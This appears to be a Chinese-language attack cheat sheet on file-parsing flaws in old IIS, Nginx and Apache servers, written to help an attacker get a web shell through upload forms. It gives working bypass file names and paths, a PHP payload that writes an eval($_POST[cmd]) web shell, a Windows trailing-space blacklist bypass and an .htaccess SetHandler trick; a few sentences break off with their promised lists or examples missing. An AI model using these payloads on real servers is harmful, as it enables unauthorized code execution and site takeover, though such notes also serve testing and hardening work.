IIS 5.x/6.0解析漏洞
IIS 6.0解析利用方法有兩種
1.目錄解析
/xx.asp/xx.jpg
2.文件解析
1.asp;.jpg
第一種,在網站下建立文件夾的名字爲 .asp、.asa 的文件夾,其目錄內的任何擴展名的文件都被IIS當作asp文件來解析並執行。
例如創建目錄 1.asp,那麼
/1.asp/1.jpg
將被當作asp文件來執行。假設黑闊可以控制上傳文件夾路徑,就可以不管你上傳後你的圖片改不改名都能拿shell了。
第二種,在IIS6.0下,分號後面的不被解析,也就是說
1.asp;.jpg
會被服務器看成是1.asp
還有IIS6.0 默認的可執行文件除了asp還包含這三種
二、IIS 7.0/IIS 7.5/ Nginx <8.03畸形解析漏洞
Nginx解析漏洞這個偉大的漏洞是我國安全組織80sec發現的…
在默認Fast-CGI開啓狀況下,黑闊上傳一個名字爲1.jpg,內容爲
<?PHP fputs(fopen('shell.php','w'),'<?php eval($_POST[cmd])?>');?>的文件,然後訪問1.jpg/.php,在這個目錄下就會生成一句話*** shell.php
這個漏洞案例
三、Nginx <8.03 空字節代碼執行漏洞
影響版:0.5.,0.6., 0.7 <= 0.7.65, 0.8 <= 0.8.37
Nginx在圖片中嵌入PHP代碼然後通過訪問
xxx.jpg%00.php
來執行其中的代碼
四、Apache解析漏洞
Apache 是從右到左開始判斷解析,如果爲不可識別解析,就再往左判斷.
比如 1.php.owf.rar “.owf”和”.rar” 這兩種後綴是apache不可識別解析,apache就會把1.php.owf.rar解析成php.
如何判斷是不是合法的後綴就是這個漏洞的利用關鍵,測試時可以嘗試上傳一個1.php.rara.jpg.png…(把你知道的常見後綴都寫上…)去測試是否是合法後綴
五、其他
在windows環境下,xx.jpg[空格] 或xx.jpg. 這兩類文件都是不允許存在的,若這樣命名,windows會默認除去空格或點,***可以通過抓包,在文件名後加一個空格或者點繞過黑名單.若上傳成功,空格和點都會被windows自動消除,這樣也可以getshell。
如果在Apache中.htaccess可被執行.且可被上傳.那可以嘗試在.htaccess中寫入:
<FilesMatch "Hackers.jpg"> SetHandler application/x-httpd-php </FilesMatch>
然後再上傳shell.jpg的***, 這樣shell.jpg就可解析爲php文件